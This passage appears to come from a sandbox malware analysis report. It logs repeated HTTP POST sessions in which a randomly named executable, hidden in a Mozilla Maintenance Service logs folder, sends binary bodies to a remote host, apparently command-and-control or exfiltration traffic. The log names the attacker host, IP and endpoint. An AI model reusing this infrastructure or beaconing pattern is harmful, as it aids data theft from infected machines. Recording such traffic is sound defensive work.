                                                                    Mar 5, 2024 22:28:07.027304888 CET2592OUTData Raw: 51 5a 54 5c 5b 5c 50 50 5e 57 5a 51 57 59 50 52 54 53 54 5f 56 5f 57 5d 54 5e 5c 5b 57 5c 5a 53 41 59 55 49 5e 5e 56 5b 5f 50 5f 51 5e 5b 5f 5b 56 59 5d 5a 5f 57 5b 5c 5a 5b 52 5b 5a 50 57 5d 58 5e 59 46 53 5e 58 5d 5a 58 5d 58 5b 56 5e 50 5b 5b
                                                                    Data Ascii: QZT\[\PP^WZQWYPRTST_V_W]T^\[W\ZSAYUI^^V[_P_Q^[_[VY]Z_W[\Z[R[ZPW]X^YFS^X]ZX]X[V^P[[U]_ZZXV_Y_[WRVT[]V\\B_URAYXT_ZQ_ZWZ[^T__[][U\X\R]YPZ]]\[VT[[\U]_UX[U_[\V]ZTIR^FR[CWRX]T[TYV\YSBSP_BP_]9A.!2T'&$P&_;2]''Y2)T!!?<3$+&.;%Z"!Q*
                                                                    Mar 5, 2024 22:28:07.261246920 CET | 259 | IN | HTTP/1.1 500 Internal Server Error
                                                                    Server: nginx/1.14.1
                                                                    Date: Tue, 05 Mar 2024 21:28:07 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Content-Length: 0
                                                                    Connection: keep-alive
                                                                    Keep-Alive: timeout=20
                                                                    X-Powered-By: PHP/7.3.33
                                                                    X-Power-Supply-By: 220 Volt


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                    29 | 192.168.2.5 | 49748 | 91.227.16.11 | 80 | 4980 | C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe
                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                    Mar 5, 2024 22:28:07.599061966 CET | 324 | OUT | POST /providerVmjs_PollAuthapiBasecdndownloads.php HTTP/1.1
                                                                    Content-Type: application/octet-stream
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                    Host: h172956.srv11.test-hf.su
                                                                    Content-Length: 2596
                                                                    Expect: 100-continue
                                                                    Mar 5, 2024 22:28:07.810404062 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                    Mar 5, 2024 22:28:07.810885906 CET2596OUTData Raw: 54 5c 54 59 5e 5a 50 51 5e 57 5a 51 57 51 50 53 54 5d 54 5b 56 54 57 5a 54 5e 5c 5b 57 5c 5a 53 41 59 55 49 5e 5e 56 5b 5f 50 5f 51 5e 5b 5f 5b 56 59 5d 5a 5f 57 5b 5c 5a 5b 52 5b 5a 50 57 5d 58 5e 59 46 53 5e 58 5d 5a 58 5d 58 5b 56 5e 50 5b 5b
                                                                    Data Ascii: T\TY^ZPQ^WZQWQPST]T[VTWZT^\[W\ZSAYUI^^V[_P_Q^[_[VY]Z_W[\Z[R[ZPW]X^YFS^X]ZX]X[V^P[[U]_ZZXV_Y_[WRVT[]V\\B_URAYXT_ZQ_ZWZ[^T__[][U\X\R]YPZ]]\[VT[[\U]_UX[U_[\V]ZTIR^FR[CWRX]T[TYV\YSBSP_BP_]:/1U'#\'5:,,6\&+3Y%_8#/'6? '&>X;%Z"!Q*
                                                                    Mar 5, 2024 22:28:08.047256947 CET | 259 | IN | HTTP/1.1 500 Internal Server Error
                                                                    Server: nginx/1.14.1
                                                                    Date: Tue, 05 Mar 2024 21:28:07 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Content-Length: 0
                                                                    Connection: keep-alive
                                                                    Keep-Alive: timeout=20
                                                                    X-Powered-By: PHP/7.3.33
                                                                    X-Power-Supply-By: 220 Volt


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                    30 | 192.168.2.5 | 49749 | 91.227.16.11 | 80 | 4980 | C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe
                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                    Mar 5, 2024 22:28:08.285533905 CET | 348 | OUT | POST /providerVmjs_PollAuthapiBasecdndownloads.php HTTP/1.1
                                                                    Content-Type: application/octet-stream
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                    Host: h172956.srv11.test-hf.su
                                                                    Content-Length: 1920
                                                                    Expect: 100-continue
                                                                    Connection: Keep-Alive
                                                                    Mar 5, 2024 22:28:08.492616892 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                    Mar 5, 2024 22:28:08.492861986 CET | 1920 | OUT | Data Raw (request body)
                                                                    Mar 5, 2024 22:28:08.724802017 CET | 259 | IN | HTTP/1.1 500 Internal Server Error
                                                                    Server: nginx/1.14.1
                                                                    Date: Tue, 05 Mar 2024 21:28:08 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Content-Length: 0
                                                                    Connection: keep-alive
                                                                    Keep-Alive: timeout=20
                                                                    X-Powered-By: PHP/7.3.33
                                                                    X-Power-Supply-By: 220 Volt


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                    31 | 192.168.2.5 | 49750 | 91.227.16.11 | 80 | 4980 | C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe
                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                    Mar 5, 2024 22:28:08.383527040 CET | 348 | OUT | POST /providerVmjs_PollAuthapiBasecdndownloads.php HTTP/1.1
                                                                    Content-Type: application/octet-stream
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                    Host: h172956.srv11.test-hf.su
                                                                    Content-Length: 2596
                                                                    Expect: 100-continue
                                                                    Connection: Keep-Alive
                                                                    Mar 5, 2024 22:28:08.595164061 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                    Mar 5, 2024 22:28:08.601558924 CET | 2596 | OUT | Data Raw (request body)
                                                                    Mar 5, 2024 22:28:08.840806007 CET | 259 | IN | HTTP/1.1 500 Internal Server Error
                                                                    Server: nginx/1.14.1
                                                                    Date: Tue, 05 Mar 2024 21:28:08 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Content-Length: 0
                                                                    Connection: keep-alive
                                                                    Keep-Alive: timeout=20
                                                                    X-Powered-By: PHP/7.3.33
                                                                    X-Power-Supply-By: 220 Volt


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                    32 | 192.168.2.5 | 49751 | 91.227.16.11 | 80 | 4980 | C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe
                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                    Mar 5, 2024 22:28:09.179769993 CET | 324 | OUT | POST /providerVmjs_PollAuthapiBasecdndownloads.php HTTP/1.1
                                                                    Content-Type: application/octet-stream
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                    Host: h172956.srv11.test-hf.su
                                                                    Content-Length: 2596
                                                                    Expect: 100-continue
                                                                    Mar 5, 2024 22:28:09.392488003 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                    Mar 5, 2024 22:28:09.392728090 CET | 2596 | OUT | Data Raw (request body)
                                                                    Mar 5, 2024 22:28:09.630620003 CET | 259 | IN | HTTP/1.1 500 Internal Server Error
                                                                    Server: nginx/1.14.1
                                                                    Date: Tue, 05 Mar 2024 21:28:09 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Content-Length: 0
                                                                    Connection: keep-alive
                                                                    Keep-Alive: timeout=20
                                                                    X-Powered-By: PHP/7.3.33
                                                                    X-Power-Supply-By: 220 Volt


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                    33 | 192.168.2.5 | 49752 | 91.227.16.11 | 80 | 4980 | C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe
                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                    Mar 5, 2024 22:28:09.957735062 CET | 348 | OUT | POST /providerVmjs_PollAuthapiBasecdndownloads.php HTTP/1.1
                                                                    Content-Type: application/octet-stream
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                    Host: h172956.srv11.test-hf.su
                                                                    Content-Length: 2596
                                                                    Expect: 100-continue
                                                                    Connection: Keep-Alive
                                                                    Mar 5, 2024 22:28:10.166389942 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                    Mar 5, 2024 22:28:10.166847944 CET | 2596 | OUT | Data Raw (request body)
                                                                    Mar 5, 2024 22:28:10.405184984 CET | 259 | IN | HTTP/1.1 500 Internal Server Error
                                                                    Server: nginx/1.14.1
                                                                    Date: Tue, 05 Mar 2024 21:28:10 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Content-Length: 0
                                                                    Connection: keep-alive
                                                                    Keep-Alive: timeout=20
                                                                    X-Powered-By: PHP/7.3.33
                                                                    X-Power-Supply-By: 220 Volt


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                    34 | 192.168.2.5 | 49753 | 91.227.16.11 | 80 | 4980 | C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe
                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                    Mar 5, 2024 22:28:10.743438959 CET | 348 | OUT | POST /providerVmjs_PollAuthapiBasecdndownloads.php HTTP/1.1
                                                                    Content-Type: application/octet-stream
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                    Host: h172956.srv11.test-hf.su
                                                                    Content-Length: 2596
                                                                    Expect: 100-continue
                                                                    Connection: Keep-Alive
                                                                    Mar 5, 2024 22:28:10.954071045 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                    Mar 5, 2024 22:28:10.954355955 CET | 2596 | OUT | Data Raw (request body)
                                                                    Mar 5, 2024 22:28:11.192996979 CET | 259 | IN | HTTP/1.1 500 Internal Server Error
                                                                    Server: nginx/1.14.1
                                                                    Date: Tue, 05 Mar 2024 21:28:11 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Content-Length: 0
                                                                    Connection: keep-alive
                                                                    Keep-Alive: timeout=20
                                                                    X-Powered-By: PHP/7.3.33
                                                                    X-Power-Supply-By: 220 Volt


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                    35 | 192.168.2.5 | 49754 | 91.227.16.11 | 80 | 4980 | C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe
                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                    Mar 5, 2024 22:28:11.526283026 CET | 348 | OUT | POST /providerVmjs_PollAuthapiBasecdndownloads.php HTTP/1.1
                                                                    Content-Type: application/octet-stream
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                    Host: h172956.srv11.test-hf.su
                                                                    Content-Length: 2596
                                                                    Expect: 100-continue
                                                                    Connection: Keep-Alive
                                                                    Mar 5, 2024 22:28:11.735399961 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                    Mar 5, 2024 22:28:11.735678911 CET | 2596 | OUT | Data Raw (request body)
                                                                    Mar 5, 2024 22:28:11.972791910 CET | 259 | IN | HTTP/1.1 500 Internal Server Error
                                                                    Server: nginx/1.14.1
                                                                    Date: Tue, 05 Mar 2024 21:28:11 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Content-Length: 0
                                                                    Connection: keep-alive
                                                                    Keep-Alive: timeout=20
                                                                    X-Powered-By: PHP/7.3.33
                                                                    X-Power-Supply-By: 220 Volt


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                    36 | 192.168.2.5 | 49755 | 91.227.16.11 | 80 | 4980 | C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe
                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                    Mar 5, 2024 22:28:12.306653976 CET | 348 | OUT | POST /providerVmjs_PollAuthapiBasecdndownloads.php HTTP/1.1
                                                                    Content-Type: application/octet-stream
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                    Host: h172956.srv11.test-hf.su
                                                                    Content-Length: 2596
                                                                    Expect: 100-continue
                                                                    Connection: Keep-Alive
                                                                    Mar 5, 2024 22:28:12.516571045 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                    Mar 5, 2024 22:28:12.516841888 CET | 2596 | OUT | Data Raw (request body)
                                                                    Mar 5, 2024 22:28:12.753910065 CET | 259 | IN | HTTP/1.1 500 Internal Server Error
                                                                    Server: nginx/1.14.1
                                                                    Date: Tue, 05 Mar 2024 21:28:12 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Content-Length: 0
                                                                    Connection: keep-alive
                                                                    Keep-Alive: timeout=20
                                                                    X-Powered-By: PHP/7.3.33
                                                                    X-Power-Supply-By: 220 Volt


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                    37 | 192.168.2.5 | 49756 | 91.227.16.11 | 80 | 4980 | C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe
                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                    Mar 5, 2024 22:28:13.085613966 CET | 348 | OUT | POST /providerVmjs_PollAuthapiBasecdndownloads.php HTTP/1.1
                                                                    Content-Type: application/octet-stream
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                    Host: h172956.srv11.test-hf.su
                                                                    Content-Length: 2596
                                                                    Expect: 100-continue
                                                                    Connection: Keep-Alive
                                                                    Mar 5, 2024 22:28:13.295514107 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                    Mar 5, 2024 22:28:13.295778036 CET | 2596 | OUT | Data Raw (request body)
                                                                    Mar 5, 2024 22:28:13.536344051 CET | 259 | IN | HTTP/1.1 500 Internal Server Error
                                                                    Server: nginx/1.14.1
                                                                    Date: Tue, 05 Mar 2024 21:28:13 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Content-Length: 0
                                                                    Connection: keep-alive
                                                                    Keep-Alive: timeout=20
                                                                    X-Powered-By: PHP/7.3.33
                                                                    X-Power-Supply-By: 220 Volt


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                    38 | 192.168.2.5 | 49758 | 91.227.16.11 | 80 | 4980 | C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe
                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                    Mar 5, 2024 22:28:13.950212955 CET | 348 | OUT | POST /providerVmjs_PollAuthapiBasecdndownloads.php HTTP/1.1
                                                                    Content-Type: application/octet-stream
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                    Host: h172956.srv11.test-hf.su
                                                                    Content-Length: 1920
                                                                    Expect: 100-continue
                                                                    Connection: Keep-Alive
                                                                    Mar 5, 2024 22:28:14.163256884 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                    Mar 5, 2024 22:28:14.163600922 CET | 1920 | OUT | Data Raw (request body)
                                                                    Mar 5, 2024 22:28:14.402573109 CET | 259 | IN | HTTP/1.1 500 Internal Server Error
                                                                    Server: nginx/1.14.1
                                                                    Date: Tue, 05 Mar 2024 21:28:14 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Content-Length: 0
                                                                    Connection: keep-alive
                                                                    Keep-Alive: timeout=20
                                                                    X-Powered-By: PHP/7.3.33
                                                                    X-Power-Supply-By: 220 Volt


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                    39 | 192.168.2.5 | 49759 | 91.227.16.11 | 80 | 4980 | C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe
                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                    Mar 5, 2024 22:28:14.069619894 CET | 348 | OUT | POST /providerVmjs_PollAuthapiBasecdndownloads.php HTTP/1.1
                                                                    Content-Type: application/octet-stream
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                    Host: h172956.srv11.test-hf.su
                                                                    Content-Length: 2596
                                                                    Expect: 100-continue
                                                                    Connection: Keep-Alive
                                                                    Mar 5, 2024 22:28:14.281599998 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                    Mar 5, 2024 22:28:14.281883001 CET | 2596 | OUT | Data Raw (request body)
                                                                    Mar 5, 2024 22:28:14.519728899 CET | 259 | IN | HTTP/1.1 500 Internal Server Error
                                                                    Server: nginx/1.14.1
                                                                    Date: Tue, 05 Mar 2024 21:28:14 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Content-Length: 0
                                                                    Connection: keep-alive
                                                                    Keep-Alive: timeout=20
                                                                    X-Powered-By: PHP/7.3.33
                                                                    X-Power-Supply-By: 220 Volt


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                    40 | 192.168.2.5 | 49761 | 91.227.16.11 | 80 | 4980 | C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe
                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                    Mar 5, 2024 22:28:14.870553970 CET | 324 | OUT | POST /providerVmjs_PollAuthapiBasecdndownloads.php HTTP/1.1
                                                                    Content-Type: application/octet-stream
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                    Host: h172956.srv11.test-hf.su
                                                                    Content-Length: 2596
                                                                    Expect: 100-continue
                                                                    Mar 5, 2024 22:28:15.080544949 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                    Mar 5, 2024 22:28:15.080835104 CET | 2596 | OUT | Data Raw (request body)
                                                                    Mar 5, 2024 22:28:15.316240072 CET | 259 | IN | HTTP/1.1 500 Internal Server Error
                                                                    Server: nginx/1.14.1
                                                                    Date: Tue, 05 Mar 2024 21:28:15 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Content-Length: 0
                                                                    Connection: keep-alive
                                                                    Keep-Alive: timeout=20
                                                                    X-Powered-By: PHP/7.3.33
                                                                    X-Power-Supply-By: 220 Volt


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                    41 | 192.168.2.5 | 49762 | 91.227.16.11 | 80 | 4980 | C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe
                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                    Mar 5, 2024 22:28:15.650456905 CET | 348 | OUT | POST /providerVmjs_PollAuthapiBasecdndownloads.php HTTP/1.1
                                                                    Content-Type: application/octet-stream
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                    Host: h172956.srv11.test-hf.su
                                                                    Content-Length: 2596
                                                                    Expect: 100-continue
                                                                    Connection: Keep-Alive
                                                                    Mar 5, 2024 22:28:15.863030910 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                    Mar 5, 2024 22:28:15.863465071 CET | 2596 | OUT | Data: 2596-byte request body
                                                                    Mar 5, 2024 22:28:16.101322889 CET | 259 | IN | HTTP/1.1 500 Internal Server Error
                                                                    Server: nginx/1.14.1
                                                                    Date: Tue, 05 Mar 2024 21:28:15 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Content-Length: 0
                                                                    Connection: keep-alive
                                                                    Keep-Alive: timeout=20
                                                                    X-Powered-By: PHP/7.3.33
                                                                    X-Power-Supply-By: 220 Volt


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                    42 | 192.168.2.5 | 49763 | 91.227.16.11 | 80 | 4980 | C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe
                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                    Mar 5, 2024 22:28:16.445529938 CET | 348 | OUT | POST /providerVmjs_PollAuthapiBasecdndownloads.php HTTP/1.1
                                                                    Content-Type: application/octet-stream
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                    Host: h172956.srv11.test-hf.su
                                                                    Content-Length: 2592
                                                                    Expect: 100-continue
                                                                    Connection: Keep-Alive
                                                                    Mar 5, 2024 22:28:16.654473066 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                    Mar 5, 2024 22:28:16.654761076 CET | 2592 | OUT | Data: 2592-byte request body
                                                                    Mar 5, 2024 22:28:16.889998913 CET | 259 | IN | HTTP/1.1 500 Internal Server Error
                                                                    Server: nginx/1.14.1
                                                                    Date: Tue, 05 Mar 2024 21:28:16 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Content-Length: 0
                                                                    Connection: keep-alive
                                                                    Keep-Alive: timeout=20
                                                                    X-Powered-By: PHP/7.3.33
                                                                    X-Power-Supply-By: 220 Volt


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                    43 | 192.168.2.5 | 49764 | 91.227.16.11 | 80 | 4980 | C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe
                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                    Mar 5, 2024 22:28:17.227621078 CET | 348 | OUT | POST /providerVmjs_PollAuthapiBasecdndownloads.php HTTP/1.1
                                                                    Content-Type: application/octet-stream
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                    Host: h172956.srv11.test-hf.su
                                                                    Content-Length: 2596
                                                                    Expect: 100-continue
                                                                    Connection: Keep-Alive
                                                                    Mar 5, 2024 22:28:17.438447952 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                    Mar 5, 2024 22:28:17.438711882 CET | 2596 | OUT | Data: 2596-byte request body
                                                                    Mar 5, 2024 22:28:17.675271988 CET | 259 | IN | HTTP/1.1 500 Internal Server Error
                                                                    Server: nginx/1.14.1
                                                                    Date: Tue, 05 Mar 2024 21:28:17 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Content-Length: 0
                                                                    Connection: keep-alive
                                                                    Keep-Alive: timeout=20
                                                                    X-Powered-By: PHP/7.3.33
                                                                    X-Power-Supply-By: 220 Volt


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                    44 | 192.168.2.5 | 49765 | 91.227.16.11 | 80 | 4980 | C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe
                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                    Mar 5, 2024 22:28:18.006028891 CET | 348 | OUT | POST /providerVmjs_PollAuthapiBasecdndownloads.php HTTP/1.1
                                                                    Content-Type: application/octet-stream
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                    Host: h172956.srv11.test-hf.su
                                                                    Content-Length: 2596
                                                                    Expect: 100-continue
                                                                    Connection: Keep-Alive
                                                                    Mar 5, 2024 22:28:18.212816000 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                    Mar 5, 2024 22:28:18.213202000 CET | 2596 | OUT | Data: 2596-byte request body
                                                                    Mar 5, 2024 22:28:18.445039034 CET | 259 | IN | HTTP/1.1 500 Internal Server Error
                                                                    Server: nginx/1.14.1
                                                                    Date: Tue, 05 Mar 2024 21:28:18 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Content-Length: 0
                                                                    Connection: keep-alive
                                                                    Keep-Alive: timeout=20
                                                                    X-Powered-By: PHP/7.3.33
                                                                    X-Power-Supply-By: 220 Volt


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                    45 | 192.168.2.5 | 49766 | 91.227.16.11 | 80 | 4980 | C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe
                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                    Mar 5, 2024 22:28:18.789153099 CET | 348 | OUT | POST /providerVmjs_PollAuthapiBasecdndownloads.php HTTP/1.1
                                                                    Content-Type: application/octet-stream
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                    Host: h172956.srv11.test-hf.su
                                                                    Content-Length: 2596
                                                                    Expect: 100-continue
                                                                    Connection: Keep-Alive
                                                                    Mar 5, 2024 22:28:18.998939991 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                    Mar 5, 2024 22:28:18.999337912 CET | 2596 | OUT | Data: 2596-byte request body
                                                                    Mar 5, 2024 22:28:19.238918066 CET | 259 | IN | HTTP/1.1 500 Internal Server Error
                                                                    Server: nginx/1.14.1
                                                                    Date: Tue, 05 Mar 2024 21:28:19 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Content-Length: 0
                                                                    Connection: keep-alive
                                                                    Keep-Alive: timeout=20
                                                                    X-Powered-By: PHP/7.3.33
                                                                    X-Power-Supply-By: 220 Volt


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                    46 | 192.168.2.5 | 49767 | 91.227.16.11 | 80 | 4980 | C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe
                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                    Mar 5, 2024 22:28:19.591794014 CET | 348 | OUT | POST /providerVmjs_PollAuthapiBasecdndownloads.php HTTP/1.1
                                                                    Content-Type: application/octet-stream
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                    Host: h172956.srv11.test-hf.su
                                                                    Content-Length: 2596
                                                                    Expect: 100-continue
                                                                    Connection: Keep-Alive
                                                                    Mar 5, 2024 22:28:19.804528952 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                    Mar 5, 2024 22:28:19.804761887 CET | 2596 | OUT | Data: 2596-byte request body
                                                                    Mar 5, 2024 22:28:20.045877934 CET | 259 | IN | HTTP/1.1 500 Internal Server Error
                                                                    Server: nginx/1.14.1
                                                                    Date: Tue, 05 Mar 2024 21:28:19 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Content-Length: 0
                                                                    Connection: keep-alive
                                                                    Keep-Alive: timeout=20
                                                                    X-Powered-By: PHP/7.3.33
                                                                    X-Power-Supply-By: 220 Volt


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                    47 | 192.168.2.5 | 49768 | 91.227.16.11 | 80 | 4980 | C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe
                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                    Mar 5, 2024 22:28:19.618768930 CET | 348 | OUT | POST /providerVmjs_PollAuthapiBasecdndownloads.php HTTP/1.1
                                                                    Content-Type: application/octet-stream
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                    Host: h172956.srv11.test-hf.su
                                                                    Content-Length: 1920
                                                                    Expect: 100-continue
                                                                    Connection: Keep-Alive
                                                                    Mar 5, 2024 22:28:19.831635952 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                    Mar 5, 2024 22:28:19.831800938 CET | 1920 | OUT | Data: 1920-byte request body
